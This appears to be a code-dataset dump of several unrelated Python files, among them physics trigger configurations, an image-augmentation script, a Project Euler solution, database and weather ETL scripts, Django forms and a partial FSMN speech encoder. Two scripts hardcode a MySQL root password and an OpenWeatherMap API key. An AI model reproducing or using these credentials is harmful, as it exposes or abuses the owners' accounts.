Albrecht\n# Lines for Bs -> mu mu WG\n\nBs2MuMuLines = {\n 'BUILDERTYPE' : 'Bs2MuMuLinesConf',\n 'CONFIG' : {\n 'DefaultLinePrescale' : 1,\n 'DefaultLinePostscale' : 1,\n 'Bs2mmWideLinePrescale' : 1,\n 'Bs2mmWideLinePostscale' : 1,\n 'LooseLinePrescale' : 0.02,\n 'LooseLinePostscale' : 1,\n 'BuPrescale' : 1,\n 'BuPostscale' : 1,\n 'BsPrescale' : 1,\n 'BsPostscale' : 1,\n 'BdPrescale' : 1,\n 'BdPostscale' : 1,\n 'JPsiLinePrescale' : 1,\n 'JPsiLinePostscale' : 1,\n 'JPsiLooseLinePrescale' : 0.1,\n 'JPsiLooseLinePostscale' : 1,\n 'JPsiPromptLinePrescale' : 0.005,\n 'JPsiPromptLinePostscale': 1,\n 'MuIPChi2_loose' : 9,\n 'MuTrChi2_loose' : 10,\n 'BIPChi2_loose' : 64,\n 'BFDChi2_loose' : 100\n },\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n# Diego + Xabier\n\nKS02MuMu = {\n 'BUILDERTYPE' : 'K0s2MuMuLinesConf',\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Dimuon' ],\n 'CONFIG' : {\n 'NoMuIDLinePrescale' : 1e-03,\n 'NoMuIDLinePostscale' : 1,\n 'K0s2mmLinePrescale' : 1,\n 'K0s2mmLinePostscale' : 1\n }\n}\n\n# N. 
Serra, Vava\nB2XTau = {\n 'BUILDERTYPE' : 'B2XTauConf',\n 'STREAMS' : ['Bhadron'],\n 'WGs' : ['RD'] ,\n 'CONFIG' : {\n 'PT_HAD_ALL_FINAL_STATE' : '200', # MeV\n 'P_HAD_ALL_FINAL_STATE' : '2000', # MeV\n 'IPCHI2_HAD_ALL_FINAL_STATE' : '9', # dimensionless\n 'TRACKCHI2_HAD_ALL_FINAL_STATE' : '4', # dimensionless\n #\n 'PT_MU' : '800', # MeV\n 'P_MU' : '6000', # MeV \n 'IPCHI2_MU' : '16', # MeV \n #\n 'PT_B_TT' : '5000', # MeV\n 'PT_B_TT_HIGH' : '10000', # MeV \n 'PT_B_TM' : '2000', # MeV\n 'PT_B_TM_HIGH' : '7500', # MeV \n 'VCHI2_B' : '100', # dimensionless\n 'FDCHI2_B' : '144', # dimensionless\n 'DIRA_B' : '0.99', # dimensionless\n 'MASS_LOW_B' : '2000', # MeV \n 'MASS_HIGH_B' : '5750', # MeV\n 'MCOR_LOW_B' : '4000', # MeV\n 'MCOR_HIGH_B' : '7000', # MeV\n 'MIPCHI2_B' : '150', # dimensionless \n 'MIPCHI2_B_HIGH' : '36', # dimensionless \n #\n 'PT_TAU' : '1500', # MeV\n 'VCHI2_TAU' : '20', # dimensionless\n 'IPCHI2_TAU' : '9', # dimensionless\n 'FDCHI2_TAU' : '144', # dimensionless\n 'MASS_LOW_TAU' : '700', # MeV\n 'MASS_HIGH_TAU' : '1800', # MeV\n #\n 'PT_B_CHILD_BEST' : '1800', # MeV\n 'P_B_CHILD_BEST' : '10000',# MeV\n 'IPCHI2_B_CHILD_BEST' : '16', # dimensionless\n 'PT_B_TAU_CHILD_BEST' : '3000', # MeV\n 'IPCHI2_B_TAU_CHILD_BEST' : '16', # dimensionless\n #\n 'MASS_LOW_D' : '1800', # MeV\n 'MASS_HIGH_D' : '2030', # MeV \n #\n 'B2TauTau_TOSLinePrescale' : 1,\n 'B2TauTau_TOSLinePostscale' : 1,\n 'B2DD_TOSLinePrescale' : 1,\n 'B2DD_TOSLinePostscale' : 1,\n 'B2TauMu_TOSLinePrescale' : 1,\n 'B2TauMu_TOSLinePostscale' : 1,\n 'B2DMu_TOSLinePrescale' : 0.2,\n 'B2DMu_TOSLinePostscale' : 1,\n 'B2TauTau_TISLinePrescale' : 1,\n 'B2TauTau_TISLinePostscale' : 1,\n 'B2DD_TISLinePrescale' : 1,\n 'B2DD_TISLinePostscale' : 1,\n 'B2TauMu_TISLinePrescale' : 1,\n 'B2TauMu_TISLinePostscale' : 1,\n 'B2DMu_TISLinePrescale' : 0.2,\n 'B2DMu_TISLinePostscale' : 1.\n }\n }\n\nTau2PMuMu = { \n 'BUILDERTYPE' : 'StrippingTau2PMuMuConf',\n 'STREAMS' : ['Dimuon'],\n 'WGs' : [ 'RD' ] ,\n 'CONFIG' 
: {\n #\n # Selection of basic muons and protons \n #\n 'GoodMuons' : \" ( PT > 300 * MeV ) & ( TRCHI2DOF < 3 ) & ( PIDmu > -5 ) & ( (PIDmu - PIDK) > 0 )\" ,\n 'GoodProtons' : \" ( PT > 300 * MeV ) & ( TRCHI2DOF < 3 )\" ,\n #\n # Prescale \n #\n 'pmumu-Prescale' : 1.00 , \n #\n # Technicalities:\n #\n 'Preambulo' : [\n ## shortcut for chi2 of vertex fit \n 'chi2vx = VFASPF(VCHI2) ' ,\n ## shortcut for the c*tau\n \"from GaudiKernel.PhysicalConstants import c_light\" ,\n \"ctau = BPVLTIME ( ) * c_light \" \n ]\n #\n }\n }\n\nTau23Mu = {\n 'BUILDERTYPE' : 'Tau23MuLinesConf',\n 'STREAMS' : ['Dimuon'],\n 'WGs' : ['RD'],\n 'CONFIG' : {\n 'TauPrescale' :1,\n 'TauPostscale' :1,\n 'Ds23PiTISPrescale' :0.02,\n 'Ds23PiTISPostscale' :1,\n 'Ds23PiPrescale' :0.01,\n 'Ds23PiPostscale' :1,\n 'Ds2PhiPiPrescale' :1,\n 'Ds2PhiPiPostscale' :1, \n }\n }\n\n# J. Albrecht\n# Searches for highly displaced dimuons \nVeryDetachedJpsi = {\n 'BUILDERTYPE' : 'VDetJPsiLinesConf',\n 'STREAMS' : ['Dimuon'],\n 'WGs' : ['RD'],\n 'CONFIG' : {\n 'VDetJPsiLinePrescale' : 1,\n 'VDetJPsiLinePostscale' : 1,\n }\n }\n\n\n\n# N. Serra , M. 
De Cian \n# Searches for highly displaced dimuons for Inflaton searches\nInflaton2MuMu = {\n 'BUILDERTYPE' : 'StrippingInflaton2MuMuConf' ,\n 'STREAMS' : [ 'Dimuon' ],\n 'WGs' : [ 'RD' ] ,\n 'CONFIG' : {\n 'Inflaton2MuMuLongPrescale' : 1,\n 'Inflaton2MuMuDownstreamPrescale' : 1,\n 'Inflaton2MuMuLongPostscale' : 1,\n 'Inflaton2MuMuDownstreamPostscale' : 1\n }\n }\n","sub_path":"Stripping/Phys/StrippingSettings/python/StrippingSettings/Stripping17/LineConfigDictionaries_RDWG.py","file_name":"LineConfigDictionaries_RDWG.py","file_ext":"py","file_size_in_byte":21471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"44390429","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 7 22:57:56 2020\n\n@author: jiayi\n\"\"\"\nimport os\nimport glob\nimport PIL\nimport json\n\ntrain_file = open('train.txt', \"r\")\ntrain = train_file.readlines()\ntrain_paths = list()\nfor p in train:\n p = p.split('\\n')[0]\n train_paths.append(p)\n \nROOT_PATH = \"/home/jiayi/aridDataset/arid_40k_scene_dataset\"\n \nEXP1_ROOT = ROOT_PATH + \"/Exp_1\"\nEXP2_ROOT = ROOT_PATH + \"/Exp_2\"\nEXP4_ROOT = ROOT_PATH + \"/Exp_4\"\nEXP7_ROOT = ROOT_PATH + \"/Exp_7\"\n\ndef create_json(root, img_path):\n obj_id = img_path.split('/')[-2]\n filename = img_path.split('/')[-1].split('.')[0]\n json_path = root.split('rgb')[0] + filename + \".json\" \n image = PIL.Image.open(img_path)\n width, height = image.size\n annotation = {\n \"annotations\": [\n {\n \"class\": \"obj\",\n \"height\": height,\n \"id\": obj_id,\n \"type\": \"rect\",\n \"width\": width,\n \"x\": 0,\n \"y\": 0\n }], \n \"class\": \"image\",\n \"filename\": filename + \".png\"}\n #print(annotation)\n with open(json_path, 'w') as outfile:\n json.dump(annotation, outfile)\n \n \n\ndef get_crops(source_path):\n crops_list = list()\n for root,_,files in os.walk(source_path):\n if root.split('/')[-1] == \"crops\":\n for f in glob.glob(root + \"/*/*.png\"):\n #if source_path is not 
EXP1_ROOT:\n #create_json(root, f)\n crops_list.append(f)\n return crops_list\n#\n#crops = list()\n#crops += get_crops(EXP1_ROOT)\n#crops += get_crops(EXP2_ROOT)\n#crops += get_crops(EXP7_ROOT)\n#crops += get_crops(EXP4_ROOT)\n#\n#print(len(crops))\n\n\n#file = open('augmented_train.txt', 'w+')\n#for img in glob.glob(\"/home/jiayi/aridDataset/augmented/*.png\"):\n# file.write(img + \"\\n\")\n# \n#file.close()\n\n#file = open('crop_train.txt', 'w+')\n#index_crop = 0\n#while index_crop <= 1000:\n# file.write(crops[index_crop] + \"\\n\")\n# index_crop += 1\n#file.close()\nflipped = []\nfor f in glob.glob('/home/jiayi/aridDataset/flip/*.png'):\n flipped.append(f)\n \n\nimport random\nfrom scipy import ndarray\nimport skimage as sk\nfrom skimage import img_as_ubyte\nfrom skimage import transform\nfrom skimage import util\n#\ndef random_rotation(image_array: ndarray):\n # pick a random degree of rotation between 25% on the left and 25% on the right\n random_degree = random.uniform(-25, 25)\n return sk.transform.rotate(image_array, random_degree)\n\ndef random_noise(image_array: ndarray):\n # add random noise to the image\n return sk.util.random_noise(image_array)\n\ndef horizontal_flip(image_array: ndarray):\n # horizontal flip doesn't need skimage, it's easy as flipping the image array of pixels !\n return image_array[:, ::-1]\n \n# dictionary of the transformations functions we defined earlier\navailable_transformations = {\n #'rotate': random_rotation,\n 'noise': random_noise\n #'horizontal_flip': horizontal_flip\n}\n\nnum_generated_files = 0\n\nwhile num_generated_files <= 1000:\n # random image from the folder\n image_path = random.choice(flipped)\n #obj_id = image_path.split('/')[-2]\n # read image as an two dimensional array of pixels\n image_to_transform = sk.io.imread(image_path)\n # random num of transformations to apply\n num_transformations_to_apply = random.randint(1, len(available_transformations))\n \n num_transformations = 0\n transformed_image = None\n 
while num_transformations <= num_transformations_to_apply:\n # choose a random transformation to apply for a single image\n key = random.choice(list(available_transformations))\n transformed_image = available_transformations[key](image_to_transform)\n num_transformations += 1\n \n # define a name for our new file\n new_file_path = image_path\n sk.io.imsave(new_file_path,img_as_ubyte(transformed_image))\n\n# write image to the disk\n #sk.io.imsave(new_file_path, transformed_image)\n# image = PIL.Image.open(new_file_path)\n# width, height = image.size\n# print(width, height)\n# annotation = {\n# \"annotations\": [\n# {\n# \"class\": \"obj\",\n# \"height\": height,\n# \"id\": obj_id,\n# \"type\": \"rect\",\n# \"width\": width,\n# \"x\": 0,\n# \"y\": 0\n# }], \n# \"class\": \"image\",\n# \"filename\": image_path.split('/')[-1]}\n# \n# json_path = image_path.split('.')[0] + '.json'\n# with open(json_path, 'w') as outfile:\n# json.dump(annotation, outfile)\n\n num_generated_files += 1\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"add_crops.py","file_name":"add_crops.py","file_ext":"py","file_size_in_byte":4545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"84345190","text":"\"\"\"\nMichael S. 
Emanuel\nMon May 14 16:24:27 2018\n\nComposites with prime repunit property\nProblem 130\n\nA number consisting entirely of ones is called a repunit.\nWe shall define R(k) to be a repunit of length k; for example, R(6) = 111111.\n\nGiven that n is a positive integer and GCD(n, 10) = 1, it can be shown that there always exists a\nvalue, k, for which R(k) is divisible by n, and let A(n) be the least such value of k;\nfor example, A(7) = 6 and A(41) = 5.\n\nYou are given that for all primes, p > 5, that p − 1 is divisible by A(p).\nFor example, when p = 41, A(41) = 5, and 40 is divisible by 5.\n\nHowever, there are rare composite values for which this is also true;\nthe first five examples being 91, 259, 451, 481, and 703.\n\nFind the sum of the first twenty-five composite values of n for which\nGCD(n, 10) = 1 and n − 1 is divisible by A(n).\n\"\"\"\n\nfrom Euler.Primes import PrimeTable, generateCoprimes\nfrom Euler.Repunit import minDivisor\nfrom typing import List, Tuple, Iterator\n\n\ndef hasSpecialProp(pt: PrimeTable, n: int, b: int = 10) -> bool:\n \"\"\"Does n have the special property that n-1 divides A(n)?\"\"\"\n # Find the min divisor An\n An: int = minDivisor(n, pt, b)\n return (n-1) % An == 0\n\n\ndef findSpecialComposites(pt: PrimeTable, goal: int, b: int = 10) -> List[int]:\n \"\"\"Find special composite numbers.\"\"\"\n # Special numbers found\n specialNums: List[int] = []\n specialCount: int = len(specialNums)\n # Generator for integers coprime to b\n candidates: Iterator[int] = generateCoprimes(b)\n # Advance iterator past the largest prime factor of b\n nMin: int = max(pt.factorize(b))\n n: int = next(candidates)\n while n < nMin:\n n = next(candidates)\n # Check the first candidate\n if not pt.isPrime(n) and hasSpecialProp(pt, n, b):\n specialNums.append(n)\n specialCount = len(specialNums)\n # Iterations of work\n iters: int = 0\n # Status update\n displayInt: int = 1000\n for n in candidates:\n # Skip prime numbers- searching for composites 
only\n if pt.isPrime(n):\n continue\n # Does n have the special property?\n if hasSpecialProp(pt, n):\n specialNums.append(n)\n specialCount = len(specialNums)\n # Status update\n iters += 1\n if iters % displayInt == 0:\n print(f'Processed {iters} iters up to n={n}. Found {specialCount} so far.')\n # Have we achieved the goal?\n if specialCount >= goal:\n break\n # When we reach here, the goal has been satisfied for the first time\n return specialNums\n\n\ndef main() -> int:\n # Goal - number of special composites we seek\n goal: int = 25\n # Instantiate prime table\n pt: PrimeTable = PrimeTable(10**5)\n # Search for special composites\n specialComposites = findSpecialComposites(pt, goal)\n # The answer is the sum of the special composites\n ans: int = sum(specialComposites[:goal])\n # Print the answer\n print(f'\\nFound {goal} special composites with sum {ans}.')\n print(f'Special composites found:')\n print(specialComposites)\n return ans\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Prob130_CompositesWithRepunitProperty.py","file_name":"Prob130_CompositesWithRepunitProperty.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"114361871","text":"import pandas as pd\nimport numpy as np\nimport pymysql\n\nfrom shared import *\nfrom decimal import Decimal\nfrom datetime import datetime\n\nconnection = pymysql.connect(host='localhost',\n user='root',\n passwd='km47196',\n db='movieaugur',\n charset='utf8')\n\nrating_dir = DATA_DIR + 'ratings/'\n\nadd_movies_sql = \"\"\"INSERT INTO Movie(title, description, budget, release_date, distributer, mpaa, genre, gross, tickets_sold, rotten_tomatoes_avg, poster_url, poster_name) \nVALUES(%s, %s, NULL, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n\norg_df = get_merge_movie_df()\ndf = pd.read_csv(rating_dir + 'ratings.csv', encoding='utf-8', index_col=0)\n\ndo_not_include = list(org_df.columns.values) + ['description', 
'poster_name', 'poster_url', 'critic_average']\nreviewer_columns = [i for i in df.columns if i not in do_not_include]\n\nfor index, row in df.iterrows():\n continue\n with connection.cursor() as cursor:\n cursor.execute(add_movies_sql, (row['Title'], row['description'], datetime.strptime(row['Release Date'], '%m/%d/%Y'), row['Distributer'], row['MPAA'], row['Genre'], long(row['Gross']), long(row['Tickets Sold']), float(row['critic_average']), row['poster_url'], row['poster_name']))\n \n connection.commit()\n \nadd_user_sql = \"\"\"INSERT INTO User(professional_reviewer, full_name)\nVALUES(1, %s)\"\"\"\n\nfor reviewer in reviewer_columns:\n continue\n with connection.cursor() as cursor:\n cursor.execute(add_user_sql, (reviewer,))\n connection.commit()\n \ncount = 0\nadd_movie_user_mapping_sql = \"\"\"INSERT INTO UserMovieMapping(movie, user, rating, rating_date, rating_source)\nVALUES((SELECT id FROM Movie WHERE Title=%s and gross=%s), (SELECT id FROM User WHERE full_name=%s), %s, (SELECT release_date FROM Movie WHERE Title=%s and gross=%s), \"rt\")\"\"\"\nfor index, row in df.iterrows():\n for reviewer in reviewer_columns:\n if np.isnan(row[reviewer]):\n continue\n count += 1\n if count < 29549:\n continue \n with connection.cursor() as cursor:\n cursor.execute(add_movie_user_mapping_sql, (row['Title'], long(row['Gross']), reviewer, row[reviewer], row['Title'], long(row['Gross'])))\n \n connection.commit()\n\nconnection.close() ","sub_path":"python/ratings_to_db.py","file_name":"ratings_to_db.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"153574109","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 7 15:32:05 2021\n\n@author: mauratoner\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport requests\nimport sqlite3\nimport sys\n\n## NOTE: SEE README for execution and output via command line \n\n\n## FETCH DATA\ncost = 
pd.read_csv(\"https://raw.githubusercontent.com/mctoner/ds3002_project1/main/movehubcostofliving.csv\") #reading in link, actual csv file from kaggle and linked in github\ncost.head() #table with various costs of living for cities\nquality = pd.read_csv(\"https://raw.githubusercontent.com/mctoner/ds3002_project1/main/movehubqualityoflife.csv\")\nquality.head() #table of quality of life metrics by city\n\n## MODIFY NUMBER OF COLUMNS\n# combine cost and quality tables by common attribute 'city'\ndf=quality.merge(cost, how='inner', on='City') #concat two data sources together\n# (below) use OpenWeather API to create a column for current weather in each city\nbase_url = \"http://api.openweathermap.org/data/2.5/weather?\" #API url\napi_key = \"bc4c03efd67ea7c13afad5ec517ac952\" #my personal API key\ntemps=[] #empty list for storing city temperatures\ndescriptions=[]\n## I will now call the Open Weather Map API to add the current temp and description of weather for each city in the dataaset.\n## Note that the API can only call one city at a time with a free subscription, so I looped through the data to make multiple API calls.\nfor i in range(len(df)): #loop through each city\n city_name = df[\"City\"][i] #call for one city name\n complete_url = base_url + \"appid=\" + api_key + \"&q=\" + city_name #complete url for api call includes key and city code\n response = requests.get(complete_url)# return response object\n response.raise_for_status() #raise for status if not 2xx type response \n x = response.json() #convert data from API call into a JSON\n if x[\"cod\"] != \"404\": #if not empty or error\n current_temperature = x[\"main\"][\"temp\"] #store current temperature\n description = x[\"weather\"][0][\"description\"] #store description of weather\n temps.append(current_temperature) #append current temperature to running list of city temps\n descriptions.append(description) #append city weather description to running list \n else:\n sys.exit(\"City Not Found\") #if city 
not in API data, raise error\ndf['current_temp_kelvin']=temps #add temperatures as a column to data frame\ndf['descriptions']=descriptions #add to column in data frame\n\n# my path_to_db = \"/Users/mauratoner/sqlite/ds3002proj.db\" -- want to make this a command line variable \ntry:\n path_to_db=sys.argv[1] #command line variable will be the path to a sqlite database\n conn = sqlite3.connect(path_to_db)# create database connection and create database if it doesn't already exist\nexcept: #raises error if filepath doesn't exist\n sys.exit('File path incorrect or empty! Supply a CL file path into a database in your SQLite directory') \ncur = conn.cursor() #create cursor\n\nrecords = df.to_records(index=False) #convert dataframe to list of tuples, necessary to be compatible with SQLite format\nresult = list(records) #list of tuples to be used by cursor\n\n# create a table in the db called \"cities\" and pass a schema\ncur.execute('drop table if exists cities') #drop table if it exists so we can create new data\nconn.commit() #end transaction with commit \n\n#create table with same column names as df\ncur.execute('create table cities (city text,rating real,purchase_power real,healthcare real,pollution real,qualityoflife real,crimerating real,cappucino real,cinema real,wine real,gasoline real,avgrent real,disposable_income real,temp real,description text)')\nconn.commit() #commit the changes\n# insert multiple records of data with executemany()\ncur.executemany('insert into cities values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)', result) #insert data from df\nconn.commit() #commit the changes\n\n#lastly, check that table was created and data was entered by querying the SQLdatabase\ncur.execute(\"select * from cities\") #select all rows and cols from table cities\ndata=cur.fetchall() #store data in 'data'\n# print(data)\nif len(data)==0: #if data is empty, table was not created in sqlite successfully\n sys.exit('Error: Table was not successfully made in SQLite!') #raise error for 
incomplete creation of table\nelse: #print number of rows and columns of output data\n print(\"Task completed! A csv of cities has been edited and written to SQL database.\", '\\nrows=',len(df),'\\ncolumns=',len(df.columns))\n \n#close cursor and database connection\ncur.close()\nconn.close()\n\n\"\"\"\nSources:\n https://github.com/UVADS/ds2001/blob/main/lecture_notes/python/interacting_w_relational_database.py\n https://www.kaggle.com/blitzr/movehub-city-rankings?select=movehubqualityoflife.csv\n https://www.geeksforgeeks.org/python-find-current-weather-of-any-city-using-openweathermap-api/\n https://stackoverflow.com/questions/14994948/iterate-each-row-om-table-and-make-api-call\n https://www.programiz.com/python-programming/user-defined-exception\n https://stackoverflow.com/questions/20844347/how-would-i-make-a-custom-error-message-in-python\n https://datatofish.com/create-database-python-using-sqlite3/\n https://towardsdatascience.com/python-pandas-and-sqlite-a0e2c052456f\n https://stackoverflow.com/questions/2440147/how-to-check-the-existence-of-a-row-in-sqlite-with-python\n \"\"\"\n \n","sub_path":"proj_updated_errors.py","file_name":"proj_updated_errors.py","file_ext":"py","file_size_in_byte":5374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"230092495","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# rce-core/rce/core/container.py\n#\n# This file is part of the RoboEarth Cloud Engine framework.\n#\n# This file was originally created for RoboEearth\n# http://www.roboearth.org/\n#\n# The research leading to these results has received funding from\n# the European Union Seventh Framework Programme FP7/2007-2013 under\n# grant agreement no248942 RoboEarth.\n#\n# Copyright 2013 RoboEarth\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# 
http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# \\author/s: Dominique Hunziker\n#\n#\n\n# twisted specific imports\nfrom twisted.internet.address import IPv4Address\nfrom twisted.internet.defer import Deferred, succeed\n\n# rce specific imports\nfrom rce.core.base import Proxy\n\n\nclass Container(Proxy):\n \"\"\" Representation of an LXC container.\n \"\"\"\n def __init__(self, machine, userID):\n \"\"\" Initialize the Container.\n\n @param machine: Machine in which the container was created.\n @type machine: rce.core.machine.Machine\n\n @param userID: ID of the user who created the container.\n @type userID: str\n \"\"\"\n super(Container, self).__init__()\n self._userID = userID\n self._machine = machine\n machine.registerContainer(self)\n\n self._pending = set()\n self._address = None\n\n def getAddress(self):\n \"\"\" Get the address which should be used to connect to the environment\n process for the cloud engine internal communication. 
The method\n gets the address only once and caches the address for subsequent\n calls.\n\n @return: twisted::IPv4Address which can be used to\n connect to the ServerFactory of the cloud\n engine internal communication protocol.\n (type: twisted.internet.address.IPv4Address)\n @rtype: twisted.internet.defer.Deferred\n \"\"\"\n if self._address is None:\n if not self._pending:\n # This is the first time this method is called dispatch a call\n # to fetch the address\n def cb(result):\n self._address = result\n\n for p in self._pending:\n p.callback(result)\n\n self._pending = set()\n\n addr = self.callRemote('getPort')\n addr.addCallback(lambda port: IPv4Address('TCP',\n self._machine.IP,\n port))\n addr.addBoth(cb)\n\n d = Deferred()\n self._pending.add(d)\n return d\n\n return succeed(self._address)\n\n def destroy(self):\n \"\"\" Method should be called to destroy the container and will take care\n of deleting all circular references.\n \"\"\"\n if self._machine:\n self._machine.unregisterContainer(self)\n self._machine = None\n\n super(Container, self).destroy()\n else:\n print('container.Container destroy() called multiple times...')\n","sub_path":"rce-core/rce/core/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"455468962","text":"\nEND = \"end\"\nTEAMS_DATA = [\n \"FC_Barcelona_10_11.csv\",\n \"FC_Barcelona_19_20.csv\"\n]\n\nSCORERS_LIST_FOR_SHINDAN = [\n \"メッシ\",\n \"メッシ\",\n \"メッシ\",\n \"メッシ\",\n \"スアレス\"\n \"スアレス\"\n \"ベンゼマ\",\n \"ベンゼマ\",\n \"ベンゼマ\",\n \"ロナウド\",\n \"ロナウド\",\n \"ネイマール\",\n \"ネイマール\",\n \"イニエスタ\",\n \"ペドロ\",\n \"カカ\",\n \"ディ・マリア\",\n \"ベイル\",\n \"サンチェス\",\n \"アザール\",\n \"ムバッペ\"\n]\n","sub_path":"settings/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"424313450","text":"from django import forms\nfrom django.forms import ModelForm\nfrom django.forms import widgets\nfrom django.forms.fields import MultipleChoiceField\nfrom django.forms.widgets import SelectMultiple\nfrom . import models\n\nclass ContactForm(ModelForm):\n class Meta:\n model = models.Contact\n fields = '__all__'\n exclude = [\n 'date',\n 'status'\n ]\n widgets = {\n 'first_name': widgets.TextInput(attrs={\n 'id': 'first_name',\n 'class': 'form-control'\n }\n ),\n 'last_name': widgets.TextInput(attrs={\n 'id': 'last_name',\n 'class': 'form-control'\n }\n ),\n 'email': widgets.EmailInput(attrs={\n 'id': 'email',\n 'class': 'form-control'\n }\n ),\n 'message': widgets.Textarea(attrs={\n 'id': 'message',\n 'class': 'form-control'\n }\n ),\n }\n\nclass ReserveForm(ModelForm):\n class Meta:\n model = models.Reservation\n fields = '__all__'\n exclude = [\n 'date',\n 'status'\n ]\n widgets = {\n 'first_name': widgets.TextInput(attrs={\n 'id': 'first_name',\n 'class': 'form-control'\n }\n ),\n 'last_name': widgets.TextInput(attrs={\n 'id': 'last_name',\n 'class': 'form-control'\n }\n ),\n 'email': widgets.EmailInput(attrs={\n 'id': 'email',\n 'class': 'form-control'\n }\n ),\n 'date_start': widgets.SelectDateWidget(attrs={\n 'id': 'date_start',\n # 'class': 'form-control'\n }\n ),\n 'date_end': widgets.SelectDateWidget(attrs={\n 'id': 'date_end',\n # 'class': 'form-control'\n }\n ),\n 'car': widgets.Select(attrs={\n 'id': 'car',\n 'class': 'form-select'\n }\n ),\n 'option': widgets.Select(attrs={\n 'id': 'option',\n 'class': 'form-select'\n }\n ),\n 'message': widgets.Textarea(attrs={\n 'id': 'message',\n 'class': 'form-control',\n 'rows': '6'\n }\n ),\n }\n","sub_path":"contact/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"144757864","text":"'''\nThis problem was asked by Airbnb.\n\nYou come across a dictionary of 
sorted words in a language\n you've never seen before.\nWrite a program that returns the correct order of letters in this language.\n\nFor example, given ['xww', 'wxyz', 'wxyw', 'ywx', 'ywz'],\n you should return ['x', 'z', 'w', 'y'].\n'''\n\nimport collections\n\n\ndef find_ordered_letters(words):\n '''\n Time Complexity: O(nmk)\n - n is the size of the words array\n - m is the average word size\n - k is the size of the letters stack\n Space Complexity: O(n)\n '''\n letters = collections.deque()\n temporary_letters = collections.deque()\n visited = set()\n for i in range(len(words) - 1):\n first_word = words[i]\n second_word = words[i+1]\n size = len(first_word) if len(first_word) < len(second_word) else len(second_word)\n for j in range(size):\n first_char = first_word[j]\n second_char = second_word[j]\n if first_char != second_char:\n if first_char not in visited and second_char not in visited:\n letters.appendleft(second_char)\n letters.appendleft(first_char)\n visited.add(first_char)\n visited.add(second_char)\n elif first_char in visited and second_char not in visited:\n while letters[0] != first_char:\n temporary_letters.appendleft(letters.popleft())\n temporary_letters.appendleft(letters.popleft())\n letters.appendleft(second_char)\n while temporary_letters:\n letters.appendleft(temporary_letters.popleft())\n visited.add(second_char)\n elif first_char not in visited and second_char in visited:\n while letters[0] != second_char:\n temporary_letters.appendleft(letters.popleft())\n letters.appendleft(first_char)\n while temporary_letters:\n letters.appendleft(temporary_letters.popleft())\n visited.add(first_char)\n break\n return list(letters)\n\n\nif __name__ == '__main__':\n word_lists = [\n ['xww', 'wxyz', 'wxyw', 'ywx', 'ywz'],\n ['abc', 'abd', 'bad', 'cab', 'dab']\n ]\n for words in word_lists:\n 
print(find_ordered_letters(words))\n","sub_path":"python/unknown_alphabet.py","file_name":"unknown_alphabet.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"3638517","text":"import torch\n\nfrom espnet.nets.pytorch_backend.fsmn.feature_transform import FeatureTransform\nfrom espnet.nets.pytorch_backend.fsmn.subsampling import Conv2dSubsampling\nfrom espnet.nets.pytorch_backend.fsmn.subsampling import SpliceSubsampling\nfrom espnet.nets.pytorch_backend.fsmn.encoder_layer import FSMN, DFSMN\nfrom espnet.nets.pytorch_backend.fsmn.repeat import repeat\n\n\nclass Encoder(torch.nn.Module):\n \"\"\"FSMN encoder module\n\n :param int idim: input dim\n :param int cdim: inner dimention\n :param int hdim: hidden dimention\n :param str feature_transform_splice: splices str for feature transform\n :param str feature_transform_cmvn: cmvn files for feature transform\n :param str subsample_layer: subsample layer\n :param int num_layers: the number of encoder dfsmn layers\n :param list order: memory order for fsmn and dfsmn\n :param list stride: memory stride for fsmn and dfsmn\n \"\"\"\n\n def __init__(self, idim, cdim=512, hdim=2048,\n feature_transform_splice=None,\n feature_transform_cmvn=None,\n subsample_layer=\"conv2d\",\n skip_frame=1,\n num_layers=9,\n order=[10,1],\n stride=[1]\n ):\n super(Encoder, self).__init__()\n\n self.skip_frame = skip_frame\n self.feature_transform = FeatureTransform(feature_transform_splice, feature_transform_cmvn)\n if subsample_layer == \"conv2d\":\n self.subsample = Conv2dSubsampling(idim, cdim, skip_frame)\n else:\n raise ValueError(\"unknown subsample_layer: \" + subsample_layer)\n\n self.fsmn = FSMN(cdim, cdim, order, stride)\n self.dfsmn1 = torch.nn.ModuleList(\n [DFSMN(cdim, hdim, cdim, order, stride) for _ in range(num_layers-2)]\n )\n self.splicesample = SpliceSubsampling(cdim, cdim, skip_frame=2)\n self.dfsmn2 = torch.nn.ModuleList(\n 
